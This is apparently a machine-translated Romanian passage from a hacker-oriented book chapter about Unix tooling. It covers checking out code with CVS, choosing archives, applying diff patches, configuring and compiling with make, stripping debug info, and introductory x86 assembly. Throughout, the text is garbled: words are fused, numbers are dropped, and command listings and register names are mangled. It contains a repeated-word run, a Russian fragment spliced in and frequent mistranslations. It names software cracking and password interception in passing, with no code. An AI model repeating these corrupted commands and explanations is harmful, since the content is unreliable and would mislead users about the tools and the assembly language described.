cu cât mai mulți oameni „abordează” alfa, cu atât mai multe erori vor fi găsite în ea!Nusperați că alții vor face acest lucru pentru tine!Spre deosebire de Microsoft, dezvoltatorii de programe gratuite nu potconține o echipă de testare beta, astfel încât utilizatorii înșiși sunt obligați să lupte cu erori Cu toate acestea,aici nu există arbitrar Nu vreau - nu luptați Instrucțiunile pas -pas -pas sunt textele sursă de obicei răspândite înarhive ambalate cu arhive populare, cum ar fi PKZIP, GZIP, BZIP, mai rar sub formă de copac CVS "Ce este CV -urile?"- tuintrebi Acesta este unul dintre cele mai populare sisteme de control al versiunilor (sistem de versiune concomitentă),care permite mai multor programatori să lucreze la un singur proiect Sistemul nu numai că monitorizează modificările,sincronizând fișierele tuturor participanților, dar, de asemenea, distinge privilegiile - cine și unde potscrie Persoanele de distracție (utilizatori anonimi care nu participă la proiect) Partea I Revizuirea programelor dehacker poate citi doar Mai multe informații despre acest sistem pot fi găsite la: http://ru wikipedia org/wiki/cvs,http://www nongnu org/cvs/ (în engleză) și http: // Alexm Heere ru/ cvs-ru/ (în rusă) Pentru a lucra cu arborele CVS,este necesar să se instaleze clientul CVS (în majoritatea distribuțiilor UNIX, acest software a fost deja instalat),înregistrându -se în sistem ca anonim În general, acest lucru se face după cum urmează: $ CVS D: PSERVER: Anonim@Server:Patch Login Lista oferă un exemplu specific care ilustrează procesul de descărcare a arborelui CVS pentru emulatorulBochs Listarea Sesiunea CVS Server din exemplul Bochs $ CVS -D: PSERVER:anonymous@cvs bochs sourceforge net:/cvsroot/bochs autentificare (loggings bochs sorceforgeforge nu este o parolă, doarapăsați Enter) utilizator $ CVS - Z ~ D: PSERVER: anonymous@cvs bochs sf net:/cvsroot/bochs checkout bochs cvs:actualizarea bochs u bochsrc/ bochasrc/ bochasras/ bochasis/ bochasis/ bocha aix u bochs bochs / Beos-x -r ubochs/ conf macos (acest lucru ar putea dura câteva minute, în funcție de conectarea rețelei , apoi imediat dupăautorizare, începe procedura de sincronizare a fișierului (în acest caz, checkout, adică extragerea unui modul întregdin CVS și creând o copie de lucru) Descărcarea tuturor fișierelor de proiect se datorează faptului că nu există nimicde sincronizare Descărcarea tuturor fișierelor de proiect chiar și pe linii dedicate necesită o perioadă destul de lungăde timp Fișierele sunt transmise într -o formă neîntreruptă (mai precis, foarte slab comprimată), iar docul estemenținut doar parțial Suportul parțial al zecilor înseamnă că, cu o defalcare neașteptată a comunicării, fișiereledescărcate în întregime nu sunt transmise Cu toate acestea, descărcarea fișierelor care nu sunt transferate completîncepe mai întâi Cu defalcări frecvente de comunicare, acest lucru creează inconveniente serioase care agravează căarborele CVS conține multe fișiere suplimentare care nu se încadrează în „distribuția ambalată” Cu toate acestea, vețifi obligat să le descărcați deci care este rostul de a vă încurca cu CVS atunci?Nu este mai ușor (mai rapid, maiieftin) să folosiți arhiva finită?Nu există un răspuns cert la întrebare Pentru început, unele programe sunt distribuitedoar prin CVS Arhiva, dacă este expusă, nu conține adesea toate fișierele sau nu este actualizată de luni întregi Pe dealtă parte, atunci când noua versiune este lansată, întreaga arhivă trebuie să pompeze de la început până la sfârșit, întimp ce clientul CVS ia doar fișiere cu adevărat modificate, ceea ce economisește semnificativ traficul Pe scurt, cuactualizări frecvente, este profitabil să folosești CV -uri, în caz contrar, este mai bine să descarci arhivafinalizată, alegând iubitul tău de arhitecții propuși Apropo, chiar și în absența drepturilor de înregistrare, clientulCVS monitorizează în continuare modificarea fișierelor locale, iar dacă am corectat ceva în program, fișierele schimbate va rămâne instabil Dacă doriți să descărcați o versiune stabilă (și nu curentă!), Ar trebui să utilizați cheia -g, iarapoi linia de comandă va arăta astfel: $ CVS Update -D -G TagName, unde TagName este numele de cod al The Code of thethe the the the the the the the the the Proiect (de exemplu, rel o final), al cărui nume poate fi numit Găsițidezvoltatorii pe site -ul web sau trageți din documentație GPAVA Instrumentele Haker pentru UNIX și Linux NotăMulte servere (inclusiv http://www sourceforge net) vă permit să vizualizați arborele CVS prin interfața web, dar nuexistă prea mult sens în acest sens Pentru a descărca fișierele sursă, veți avea nevoie de un browser offline precumTeleport Pro (http://www listsoft ru/ programe/ /), deci o abordare mult mai bună este încă utilizarea clientului CVS,puteți face Ultima versiune a descărcării clientului CVS de pe serverul FTP http://ftp gnu org/ non-gnu/cvs/(http://www tortoisecvs org/, http://www wincvs org/-Versions Pentru Windows), iar dacă apar întrebări, o listăuriașă de întrebări frecvente la serviciul dvs : http://www cs utah edu/Dept/old/texinfo/cvs/faq txt poate ficonsiderată finalizată Vom face față acum arhivelor pregătite De regulă, nu sunt doar mulți dintre ei, ci multe!Deexemplu, pagina de distribuție cu care puteți descărca arhivele textelor sursă ale browserului Lynx(http://lynx isc org/current/index html), în diferite versiuni, include cincizeci de fișiere în trei formate : PKZIP,GZIP și BZIP, care au o varietate de dimensiuni (lista ) Care să ia?Cel mai risipitor pkzip, urmat de o mică marjă deGzip (de fapt, reprezentând același arhivar, dar într-o altă „întruchipare”), iar BZIP conduce cu un decalaj de , - ori Adevărat, nu în toate distribuțiile UNIX, este instalat în mod implicit, iar atunci trebuie să -l schimbe pe contpropriu: http://www bzip org/, deoarece este gratuit Listarea Textele inițiale ambalate în diverse arhive au inegale oct : [ ] iynx dev tar Z Oct : [ ] Lynx dev tar bz Oct : [ ] Lynx dev tar gz Oct : : ] Lynx dev zip, după ce a descărcat arhiva, întrebați, darexistă un patch cu cele mai recente corecții?Versiunea patch -ului trebuie să coincidă cu versiunea arhivei, altfelprogramul se va prăbuși în faza de compilare Cu toate acestea, aceasta nu este o regulă, ci mai degrabă orecomandare Totul depinde de ce fel de patch și de ce se rezolvă exact Cu toate acestea, este mai bine să nu vă asumațiriscuri fără nevoie Parse sunt de diferite tipuri De exemplu, în cazul Lynx, aceasta este o arhivă obișnuită de fișieremodificate, care trebuie doar să fie despachetate (cu rescrierea) în catalogul principal al programului În dimensiuneasa, această arhivă se apropie de distribuție Majoritatea programatorilor creează patch -uri folosind utilitatea Diff(pentru a obține informații mai detaliate despre acesta, dați comanda omului dif), care a primit numele său ca urmare areducerii diferenței de engleză - diferența Această utilitate este construită compară fișierele, afișând doar modificărireale Semnul minus (-) Stând înainte, înseamnă că această linie a fost eliminată, iar semnul plus (+) sugerează căaceastă linie a fost adăugată Numele fișierului este precedat de un triplu semn al minus ( -) sau plus (+++) Fișierelede schimbare au de obicei o extindere a diff sau patch, dar chiar și fără a le extinde este ușor de identificat vizual(lista ) De regulă, toate modificările făcute în distribuție sunt colectate într -un singur fișier dif Listarea Acesta este modul în care patch-ul creat de dif dif dif-orw- /biewlib/sysdep/ia /tuner cbiew- /syssdep/ia /tmer c-taion- /biewlib/ia /os /tmer/tmer /Tmer c /os /timer C - : : +++ BIEW- /BIWLIB/SYSDEP/IA /TIMER C - - : : + @- , + @@ Static HtimerTimerID = ;Static Tid TimerThread = ; Partea I Revizuirea programelor de hacker static Timer callback*user callback = null;-Static void noretrurn thread callback (ULONGHIP Threadmsg) +static void noretrurn syscallthread callback (ULONGH Threadmsg) {ULONG RECV;Neutilizat (threadmsg);Puteți aplica o plată diferită, în principiu șimanual Unii fac acest lucru Alții folosesc utilitatea Patch (pentru a obține informații mai detaliate, oferiți comandaomului de patch), care automatizează complet acest proces În cazul general, apelul ei arată așa cum se arată în lista Listarea Patch patch $ patch -pl înseamnă că apelăm Patch din catalogul principal al programului Pentru ce ai nevoie?Vom deschidefișierul Diff în orice editor și vom vedea cum sunt setate fișierele în fișiere, de exemplu, pentru editorul Biew, acestlucru se face după cum urmează: Biew- /BiewLib/Sysdep/IA /OS /Timer c Da, calea Începe cu numele catalogului în care programul ar trebui să fie despachetat (în acest caz, acest nume este Biew- ) Darîl putem redenumi?La urma urmei, mulți hackeri preferă denumirile scurte de fișiere în stilul „BW” Cheia -rii obligăutilitarul Patch să ignore prenumele din lanțul din stânga, iar apoi calea începe cu /biewlib, în ​​timp ce, în modnatural, catalogul Biew - (așa cum s -a menționat deja, poate fi redenumit) ar trebui să fie actual Dacă aplicăm unpatch din exteriorul directorului BIEW - , trebuie să specificați cheia -LO Absența unei cheii r duce la ignorareacompletă a căilor și toate fișierele sunt văzute în catalogul actual, unde, desigur, nu vor fi găsite!Rețineți căinstalarea patch -ului este operația reversibilă și, dacă doriți, patch -ul poate fi eliminat folosind cheia -r -ta,returnând toate liniile schimbate în loc, în afară de aceasta, acordați atenție cheii, care creează copii de rezervă aleFișierele modificate, uneori mai multe patch -uri sunt atașate la o versiune simultan, care este atașată simultan, pecare o poate încurca serios chiar și utilizatorii experimentați Citiți cu atenție descrierea: În ce ordine ar trebuiinstalate!Dacă descrierea este absentă, uitați -vă la modificări și înțelegeți procedura pentru a vă aplica sau refuzațicomplet să instalați În cazuri exotice, patch -ul este un script care realizează toate modificările de la sine Mulțidezvoltatori se atașează de arhivele semnăturilor digitale de tip PGP sau sume de control de referință Teoretic, acestlucru face posibilă prevenirea unei posibile distorsiuni a informațiilor sau a falsului acesteia Arhivele modernecontrolează integritatea datelor pe cont propriu și nici o semnătură digitală nu va economisi de la hacking -ulintenționat!Deci, decideți -vă pentru dvs - folosiți -le sau nu și trecem la principalul lucru - pentru acompila Continuăm la asamblarea dintre utilizatorii Linux, există o opinie că, dacă programul nu este colectat într -unmod „standard” (de exemplu, așa cum se arată în lista ), atunci acesta este un program incorect și va funcționaincorect De fapt, există utilizatori mult mai incorecți în lume decât programele greșite!Capitolul Instrumente dehacker pentru UNIX și Linux Idsting , bifând mâinile majorității programelor $ /Configurează $ Make $ inake insTal Începeți cu faptul că, spre deosebire de Windows World, unde programul este instalat/asamblat prin lansareaprogramelor Setup exe și nmake exe, respectiv, în unix, procesul de asamblare începe Odată cu citireadocumentației!Citește documentația este necesară!Chiar dacă ansamblul cu setările implicite trece fără o cățea și ocurvă, este puțin probabil ca configurația rezultată să fie optimă De obicei, textele inițiale sunt atașate la fișierulnumit Instalare, Readme, etc Dacă arhiva nu conține ceva asemănător (cum ar fi, de exemplu, în cazul Bochs), atuncicăutați instrucțiuni pentru asamblarea pe site -ul proiectului În cazuri deosebit de dificile, instrucțiunile pot fi îninteriorul fișierelor de configurare și makefile Fișierul de configurare este un script destul de complicat (Fig ),care analizează configurația curentă care recunoaște platforma care determină prezența tuturor bibliotecilor necesare șicontrolează opțiunile de asamblare (în special, indică ce funcții ar trebui incluse și care sunt blocate) Ca urmare aactivității sale, este generat un fișier numit Makefile, care colectează (compilează, apoi compară) programul Uniiconfiguratori au o interfață avansată și funcționează în modul interactiv, dar aceasta nu este o regulă, ci mai degrabăo excepție plăcută Mult mai des, opțiunile de asamblare sunt setate prin tastele liniei de comandă sau chiar prineditarea fișierului de configurare în sine Orez Configuratorul pentru Work Partea I Revizuirea programelor dehacker Cea mai importantă opțiune de compilare este o platformă În cele mai multe cazuri, este recunoscut automat casisteme UNIX și nu apar probleme, dar atunci când vă asamblați sub macOS, Beos, QNX, Win , puteți întâmpina dificultățigrave În ciuda faptului că dezvoltatorii se străduiesc să asigure toleranța maximă, în practică totul se întâmplăcomplet greșit Utilizatorii Windows suferă cel mai mult, deoarece această platformă nu acceptă scripturi shell, iarconfiguratorul nu funcționează acolo Chiar dacă dezvoltatorul a oferit posibilitatea compilării pentru Win , estenecesar să se gestioneze opțiunile proiectului prin editarea fișierului Make, iar pentru aceasta este, de asemenea,necesar să ne dăm seama ce linie este responsabilă pentru ce Poziția salvează parțial pachetul Cygwin (cu excepțiacazului în care este instalat), dar problemele rămân în continuare Opțiunile rămase nu mai sunt atât de cruciale, dar nule puteți atribui celor secundare În mod implicit, asamblarea cu tincturi garantează că programul se va aduna corect șipoate chiar va funcționa Cu toate acestea, este posibil să nu fie sprijinul modurilor de care aveți nevoie în acestansamblu În special, mai mult de o dată Bochs menționat este colectat în mod implicit fără emulare SoundBlaster, fără suport pentru o placă de rețea, instrucțiuni SSE/MMX, arhitectură x - , fără debugger integrat șifără a optimiza viteza codului virtual Puteți, desigur, să activați fără gândire a tuturor opțiunilor, dar aceasta estedeparte de cea mai bună idee În primul rând, multe opțiuni se confruntă între ele și, în al doilea rând, componentelesuplimentare nu numai că cresc dimensiunea fișierului compilat, dar încetinesc adesea viteza programului Prin urmare,atunci când compilați un „meniu”, este necesar să fiți foarte atenți și prudenți În special, forțați Bochs să susținăarhitectura X - , împreună cu un debugger integrat, este posibil, așa cum se arată în lista Listarea Alocareaansamblului Bochs prin linia de comandă $ /Configurare- ~ Anable-X - -Debugger, dar ce se întâmplă dacă nu există omențiune despre opțiunile de asamblare (sau există, dar incomplet)?Apoi, ar trebui să deschideți fișierul de configurareîn orice editor de text și să vizualizați opțiunile disponibile Dacă aveți noroc, acestea vor fi echipate cu comentarii(lista ) Ca opțiune, puteți încerca să oferiți o echipă $ /Configurare Help-Dacă aveți noroc, ea va retrage celpuțin unele informații de referință Listarea Configurați fragmentul de fișiere cu opțiuni de asamblare-Procesor-Procesoare enable-X - enable-CPU-nivel enable-APIC enable-Cornprenpressed-HD enable-Ne nable-PCI enable- PCIDEV- -USB-Corpile de procesoare selectate-PNIC ( , , , ) în sprijinul X - MSTRUCII SELECT SELECT CPU( , , , ) Activați APICE Allless Allless Corpressed Harpressed har iuplemented încă) Activați încă) lumted ne support enable lumted FX PCI support enable PCI host device mappmg support (linux host only) enable lumted USBsupport enable PCI pseudo NIC support Cygwin — набор свободно распространяемых программных средств, разработанныхфирмой Cygnus Solutions (в ноябре компания Cygnus Solutions announced its Fuziunea cu Red Hat și a încetat să maiexiste la începutul anului ) Pachetul Cygwin vă permite să transformați Windows din diverse versiuni într -un fel desistem UNIX Poate fi descărcat liber de pe internet (http://www cygwin com/) Capitolul Instrumente de hacker pentruUNIX și Linux Fig Configurația programului prin editarea fișierului de taxi Unele programe (de exemplu, editorulBiew Hex) nu au deloc un fișier de configurare Aceasta înseamnă că trebuie să configurați programul manual, prineditarea fișierului MakeFile (Fig ) Dar nu vă fie frică, în practică această sarcină va fi mult mai ușoară decât arputea părea la prima vedere Structura fișierului Makefile este destul de simplă De fapt, acest fișier este o secvență decomenzi și variabile (lista ) Aici vom gestiona în variabile!Lista valorilor posibile este de obicei conținută chiaracolo, în comentarii ^Listare și comentarii # Vă rugăm să selectați Platforma Target Valorile valide sunt: ​​# pentru -by Intel: i i (încă nu este acceptat de GCC) # pentru Intel pe de biți # BASIC: I I # GCC- X: I RZP P KB K ATHLON # PGC рзоartх P mmx K кбіілах K mmx x x mmx # athlon mmx # altă platformă: generică # - Platform = i # Vă rugăm să selectați sistemul deoperare țintă Valorile valide sunt: ​​# dos, OS , Win , Linux, UNIX, BeOS, QNX , QNX # Partea I Prezentare generală a programelor de hacker # Vă rugămsă adăugați ADY Gazda Specic Flags AICI # (Like- Fcall-folosit-R -fcall-Saved-R -Mrtd -MregParrn = -Mreg aloc =E T C;): #- - , dacă doriți să construiți tehnologie experimentală Vith FastCall #******************************************************* ****** **************************************************************************************************************** ******************** M + # DHAVE DNOWEX există doar peAMD's K + # -D Disable asm dezactivează tot codul de asamblare MLME # Încercați -l dacă aveți probleme cu Corrpilationla erorile de asamblare # Rețineți că nu este același lucru cu specificarea Target platform = Generic # - host cflags = Trebuie să pregătiți în avans aceaparte a variabilelor va fi atașată de mediul de lucru (mediul) autorului Această legătură va exprima că fișierul Acesta va conține modalități absolute de a viza cataloage, fișiere, biblioteci etc , sau aceste variabile vor finenumărate În acest caz, va trebui să -i întrebați singur Unele fișiere Make sunt controlate prin variabilele mediului,care trebuie să fie setate din nou înainte de compilare (lista ) Listarea , un fragment din fișierul de marcăcontrolat prin variabilele de mediu = $ (pdcurses srcdir) și, în sfârșit, există un moment solemn în care toateopțiunile sunt configurate și puteți trece la ansamblu Odată cu respirația, scriem $ make și va începe procesul deasamblare Compilația durează mult timp și destul de des este întreruptă de un mesaj de eroare Ce sa fac?Principalullucru este să nu intrați în panică, ci să citiți și să analizați cu atenție mesajul afișat Cel mai adesea, motivulerorii este că programul nu are un fișier de bibliotecă sau antet De fapt, acest lucru ar trebui identificat unconfigurator (dacă este doar), dar descărcarea componentelor care lipsesc dacă există un internet nu este o problemă Așști doar ce trebuie descărcat exact!Din păcate, Makefile este departe de a spune întotdeauna numele „oficial” albibliotecii Dar asta nu contează!Uită -te pe internet cu numele fișierului și află din ce pachet aparține și de undepoate fi descărcat În plus, este plăcut să te uiți la forumul de asistență tehnică (cu siguranță, nu te confrunți doarcu această greșeală, dar, dacă da, această problemă ar trebui discutată pe diverse forumuri) Dacă acest lucru nu ajută,citiți din nou documentația, acordând atenție la ce biblioteci și componente ale sistemului ar trebui instalate În celedin urmă, încercați diverse combinații de opțiuni de asamblare (ca opțiune - opriți tot ceea ce poate fi oprit) Situațiadevine mai gravă dacă întâmpinați erorile dezvoltatorilor înșiși La urma urmei, oamenii scriu și fișiere și departe detoate platformele pe care sunt testate Dacă da, încercați să contactați dezvoltatorii sau să colectați programul pe oaltă platformă (alt compilator) În mod implicit, programele, de regulă, sunt colectate cu informații de depanare, caresimplifică semnificativ depanarea lor, dar în același timp crește dimensiunea Dacă depanarea programelor altor persoanede GPAV Haker Instrumente pentru UNIX și Linux nu sunt incluse în planurile dvs , atunci este mai bine săeliminați informațiile de depanare Acest lucru poate fi realizat fie în etapa de configurare, oferind $Team/Configurare-debug-disable, fie reduceți manual informațiile de depanare din fișierul ELF, lipsindu-l prinutilitatea Strip, care este inclusă în majoritatea distribuțiilor UNIX Dar înainte de asta, începeți programul defișiere și vedeți cum stau lucrurile Un exemplu care ilustrează situația cu Bochs este prezentat în lista EmulatorBochs x, colectat cu setări implicite, conține un debug ^Informații $ Fișier Bochs Bochs: ELF bit LSB executabil,Intel , versiunea (SYSV), pentru GNU/Linux , Dynamical Linked (SUA Libile partajate), nu sunt dezbrăcate,deoarece informațiile despre datorii sunt prezente (nu sunt dezbrăcate), Bochs durează până la MB (lista ) Listarea Cu informații de depanare, Bochs ocupă până la MB de $ LS - Bochs Total -RW-RW-D- ROOTSTAFF - - : -RW-R-D-D-D- ROOD STAFF - - : -RWXR-XR-X ROOD STAFF - - : Bochs -RWXR-XR-X ROOD STAFF - - : BXCOMMIT -RWX-XR-X -X ROOD STAFF - - : BXIMAGE-RWXR XR-X ROOT STAFF - - : ELINKS -RWXR-XR-X ROOT STAFF - - : JS JS Deci,haideți să rulăm Utilitatea Strip și să ștergem dezbaterea ^Informații (Lista ) : Listarea Utilitatea StripDeleys informațiile de depanare din fișierul $ Strip Bochs după ștergerea informațiilor de depanare este redusă cu nouă(!) O dată și fără nicio pierdere de funcționalitate (lista ) 'Lista După ștergerea informațiilor de depanare,dimensiunea fișierului Bochs scade $ File Bochs Bochs: ELF -bit LSB executabil, Intel , versiunea (SYSV),pentru GNU/LMUX , Dynamical Linked (utilizează LIB -uri partajate), StrippDDD BOCHS Total -RW-R-R - RW-R-R-RW-R-R-RWXR-XR-X ROOD STAFF ROOD STAFF ROOD STAFF ROOD STAFF -RWXR-XR- X root -Rwxr-xr-x root root root rwxr-xr-x root -rwxr xr-x personal root Personal Personal - : - : - : - : Bochs - : BXCommit - : Bximage - : ELINKS - : JS Partea I Prezentare generală a programelor de hackeri, instalarea unui program necorespunzător, de regulă, nu este încă gata săfuncționeze Mai avem multă muncă: ștergeți fișierele intermediare create în procesul de compilare (biblioteci, fișiere obiect), configurați fișierele de configurare, plasați fișiere de date pe cataloage și, dacă estenecesar, schimbați setările sistemului Echipa $ Make Install este responsabilă pentru acest lucru, dar nu în toateprogramele pe care este implementată, pentru a lua, de exemplu, cel puțin același BIEW (lista ) Listarea , unfragment din fișierul Biew Make arată că instalarea automată nu a fost implementată prin instalare: @echo Sorry Aceastăoperație va fi efectuată manual pentru acum @exit, instalarea automată este ruletă Știm cu toții ce este capabil sătransforme curba de configurare exe Prin urmare, înainte de a intra în comanda $ Make Install, ar fi frumos să te uițiîn fișierul MakeFile (secțiunea Instalare :) și să înmoaie ceea ce va face Deodată, acest lucru nu vi se potrivește?Dacăaveți ghinion cu instalarea automată, încercați să dați comanda $ să facă dezinstaluri, care elimină programul dinsistem - dintr -o dată unul norocos?Cu toate acestea, în marea majoritate a cazurilor nu este implementată În plus,există o utilitate utilă a checklnstali (http://chcckinstall izto org/) Acesta este un utilitar distribuit gratuit $ săse instaleze pe o mașină virtuală și să genereze automat o „distribuție” completă de orice tip: Slackware, RPM sauDebian, instalată în sistem cu un manager de instalare adecvat care poate face întotdeauna corect corect Dezinstalați,chiar dacă nu a fost asigurată de programele de autor Doar în loc de $ make install, ar trebui să oferiți comanda $ sudocheckInstall și să așteptați puțin Hackerii adevărați preferă să instaleze programul cu mâinile lor folosindansamblul binar finisat ca eșantion Acesta este cel mai fiabil mod, dar necesitând timp și calificări Apropo,majoritatea instalatorilor pun programe în/usr/iocal/bin/catalog, ceea ce nu toată lumea îi place Configuratorii corecțiacceptă cheia -prefix, care vă permite să instalați programe oriunde (de exemplu, $ /Configurare prefix =/usr), greșitne obligă să facem acest lucru manual Concluzia, se dovedește, ceea ce un proces non -trivial este un ansamblumanual!Compilarea manuală este o ușă a lumii a posibilităților aproape nelimitate, dar doar unul care nu se teme dedificultăți poate intra în ea, este gata să greșească, știe să lucreze cu documentația și se îndreaptă înainte chiar șisub ploi abundente Capitolul Asamblatori Programarea cu nivel scăzut este o conversație cu un computer într -un limbajnatural, bucuria comunicării cu fierul „gol”, cea mai înaltă pilotare a zborului gândirii libere și a spațiuluinelimitat pentru autoexpresie Contrar opiniei răspândite, asamblatorul este mult mai simplu decât majoritatea limbilorde nivel ridicat Este mult mai simplu decât C ++ și poate fi stăpânit literal timp de câteva luni Tot ce este necesarpentru acest lucru este să ia startul corect și să avanseze cu încredere în direcția corectă și să nu se bucle laîntâmplare în întuneric Un hacker care nu cunoaște asamblatorul este același cu un pieptene fără vâsle Nu veți mergedeparte în limbi cu nivel înalt Pentru a sparge aplicația, ale căror texte inițiale nu sunt disponibile (iar în mareamajoritate a cazurilor situația este exact cazul), este necesar să se analizeze algoritmul său dizolvat în sălbăticiacodului mașinii Există mulți traducători ai codului mașinii în limbajul asamblatorului (se numesc DizAssemblers), dareste imposibil să restabiliți automat textul sursă în conformitate cu codul mașinii!Căutarea capacităților nedocumentateîn intestinele sistemului de operare este, de asemenea, efectuată pe asamblator Căutați marcaje, neutralizareavirușilor, adaptarea aplicațiilor la propriile nevoi, dezvoltarea inversă a aplicațiilor pentru a împrumuta ideiimplementate în ele, declasificarea algoritmilor clasificați Listarea poate fi continuată la nesfârșit Domeniul deaplicare este atât de larg încât este mai ușor să enumerați domeniile în care nu are nimic de făcut Asamblatorul este oarmă puternică care oferă o putere nelimitată asupra sistemului Aceasta nu este în niciun caz o teorie abstruse, ci unadevărat hardcore Cod autoinstrument, tehnologie de polimorfism, contraacțiune pentru debuggeri și dizassemblers,exsteps, viermi modificați genetic, spionaj din spatele evenimentelor sistemice, interceptarea parolelor asamblatorul este al șaptelea sentiment și a doua viziune Când apare o fereastră bine cunoscută, cu un strigăt de eroarecritică pe ecran, programatorii aplicați înjură și se ridică din umeri (acesta este karma la program) Toate acestemesaje și depozite pentru ele sunt o scrisoare chineză Dar nu pentru asamblatori!Acești tipi merg calm la adresaspecificată și stăpânesc eroarea, adesea chiar și fără a pierde date deghizate!Asamblatorul de filozofie Assember esteun limbaj cu nivel scăzut care funcționează cu concepte și concepte ale mașinilor Nu căutați o comandă în ea pentru ascoate linia „Hello, World!” Ea nu este aici Iată o scurtă listă de acțiuni pe care procesorul le poate efectua: Pliați/scădeți/împărțiți/multiplicați/comparați cele două numere și, în funcție de rezultat, transfer controlul către oanumită sucursală, trimiteți numărul de la o adresă la alta, scrieți numărul din port sau citiți -l de acolo Periferiaeste controlată tocmai prin porturi sau printr -o regiune specială Partea I Revizuirea programelor de memorie ahackerilor (de exemplu, memoria video) Pentru a aduce simbolul la terminal, trebuie să contactați documentația tehnicăde pe placa video și să citiți sectorul de pe disc - la documentația pentru unitate Din fericire, această parte alucrării este luată pe șoferi și, de obicei, nu este necesară să o efectueze manual (în plus, în sistemele normale deoperare, de exemplu, cum ar fi familia Windows NT, de la nivelul aplicat al porturilor nu sunt disponibil) Un altconcept de mașină este un registru Este imposibil să explici ce este, fără să păcătuiești împotriva adevărului Registruleste ceva care arată ca un registru, dar chiar nu este În mașinile antice, registrul a făcut parte din dispozitivul deprelucrare a datelor Procesorul nu poate adăuga două numere în RAM În primul rând, el trebuie să le ridice(registre) Aceasta este la nivel micro Deasupra nivelului micro există un interpret de coduri de mașină, fără de careniciunul dintre procesoarele moderne nu poate face (da, codurile mașinii sunt interpretate!) Mini-EVM DEC PDP- nu maia cerut programatorului să prevaleze datele către registre, prefăcându-le că le ia direct din memorie, datele au fostîncărcate în secret în registre interne și după efectuarea operațiunilor aritmetice, rezultatul a fost Înregistrat înmemorie sau în… registrul „logic”, care este o celulă a unei super -construcții a memoriei În calculatoarele x ,registrele sunt, de asemenea, virtuale, dar spre deosebire de PDP, și -au păstrat parțial specializarea Unele echipe (deexemplu, MUL) lucrează cu un set strict definit de registre, care nu pot fi schimbate Aceasta este o taxă decompatibilitate cu versiuni vechi O altă restricție neplăcută este aceea că X nu acceptă abordarea tipului de „memorie- memorie”, iar unul dintre numerele procesate trebuie să fie în registru sau să reprezinte valoarea directă De fapt,programul de asamblare este pe jumătate este format din comenzi de redirecționare a datelor Toate aceste acțiuni au locîn arena numită spațiu vizat Spațiul de adrese este doar un set de celule de memorie virtuală disponibile pentruprocesor Sistemele de operare de tip Windows L și majoritatea clonelor UNIX își creează propria regiune independentă de GB-momeală pentru fiecare aplicație, în care se pot distinge cel puțin trei zone de cod, zonă de date și stivă Steweste o modalitate de stocare a datelor, care este o încrucișare între listă și tablou (citiți „Arta programării” de D Knut ) Echipa de împingere plasează o nouă porțiune de date în partea de sus a stivei, iar echipa ROR elimină datele dinpartea de sus a stivei Acest lucru vă permite să salvați date în memorie fără a vă îngriji de adresele lorabsolute Foarte confortabil!Apelul funcțiilor apare la fel Echipa CAII FUNC aruncă comanda la adresa următoarei după ea,iar echipa Ret o trage din stivă Pointerul la vârful curent este stocat în registrul FSP, iar partea de jos fututăformal doar de lungimea spațiului de adrese, și astfel - numărul de memorie alocată Direcția de creștere a stivei înarhitectură x : de la adrese senior - la cele mai tinere De asemenea, ei spun că sticla crește „de sus înjos” Registrul ER conține un indicator pentru următoarea comandă executată și nu este disponibil pentru modificăridirecte Registrele EAX, Eush, Ech, Edx, Est, EDI, ebraice sunt numite registre generale -scop și pot participa liber laorice operațiuni matematice sau apel de memorie Sunt doar șapte dintre ei Șapte registre de de biți Primele patrudintre ele (EAX, EVS, ESH și EDX) permit apeluri la jumătățile lor de biți care depozitează Tânărul Word-AH, VX, SCși DX Fiecare dintre aceste cuvinte, la rândul său, este împărțit în octeți seniori și mai tineri - AH/AL, BH/BL, CH/CLși DH/DL Este important să înțelegem că Al, AH și EAX nu sunt trei regiuni diferite, ci diferite părți ale aceluiașiregistru!În plus, există și alte registre - segment, multimedia, registre de însoțire matematică, registre dedepanare Fără o carte de referință bună, este ușor să te confundăm și să te îneci în ele, dar la început nu le vomatinge Donald E Knut „The Art of Programming”, G - - „Williams”, Capitolul Asamblatorii Explicațiaasamblatorului cu exemple cu echipa principală de asamblare este Fortenerul Mov Data, care poate fi asemănat cuatribuirea Operator, C = Okzzz în asamblatorul de limbă este înregistrat după cum urmează: MOV EAX, H (acordațiatenție diferenței de înregistrare a numerelor hexadecimale!) De asemenea, puteți înregistra MOV EAX, EBX (scrieți înregistrul EAC Valoarea registrului este ex) Semnele sunt paranteze pătrate Astfel, designul limbajului cu A = *B pe asamblator esteînregistrat după cum urmează: MOV EAX, [EBX], dacă doriți, puteți adăuga la pointer cu o deplasare = b [ x ]echivalent: mov eax, [ EBX + B] Variabilele sunt declarate directive DB (variabilă unică -byte), dw (variabilă într -unsingur cuvânt), dd (variabilă în lungimea cuvântului dublu), etc Variabilele familiare nu sunt indicate atunci cândsunt declarate Aceeași variabilă în diferite secțiuni ale programului poate fi interpretată atât ca număr cu un semn,cât și ca un număr insuportabil Pentru a încărca variabila în indicator, se folosește fie echipa IEA, fie MOV cudirectiva DFSET Să arătăm acest lucru în următorul exemplu (lista ) Domnule Listare Principalele metode detrimitere a datelor Lea Edx, B Mov Eash și Mov Ech, Offset;Registrul EDX conține un indicator la o variabilă B;RegistrulEUCH conține valoarea variabilei A A;Registrul ESC conține un indicator către variabila a Mov [EDX], EVOS;Copiațivariabila în variabila B MOV B, EBX;Copiați variabila A în variabila B MOV B, A;! '! Error' nu poate faceasta ;Ambele argumente ale echipei Mool nu pot fi în memorie un DD H;Declarăm o variabilă, tipul de cuvânt dublu șiB dd?;Inițializează -l cu numărul de h;Declarăm un tip B variabil inconsecvent;Vom trece acum la tranzițiilecondiționate Nu există dacă nu există o operator de asamblare, iar această operație trebuie efectuată în douăetape Echipa PA vă permite să comparați două numere, menținând rezultatul muncii lor în steaguri Steagurile sunt o bițidintr -un registru special, a căror descriere ar ocupa prea mult spațiu și, prin urmare, nu este luată în considerareaici Este suficient să vă amintiți trei stări principale: mai puțin (mai jos sau mai puțin), mai mult (mai sus sau mare)și egale (egale) Familia echipelor de tranziție condiționată a Comitetului Executiv Central verifică starea X și, dacăeste adevărat, acestea fac o tranziție (salt) la adresa specificată De exemplu, JE efectuează o tranziție dacă numerelesunt egale (săriți dacă sunt egale) și JNE - dacă aceste numere nu sunt egale (săriți dacă nu și egal) Echipele JB/JAlucrează cu numere ilegale, ACJL/JG - cu iconic Orice două condiții care nu sunt contrare între ele pot fi combinateîntre ele De exemplu, echipa JBE efectuează o tranziție dacă una este un număr fără ambiguitate mai mic decât celălaltsau este egal cu aceasta Tranziția necondiționată este realizată de comanda JMP Designul CMP/JX este mai asemănător cudesignul limbajului de bază IF 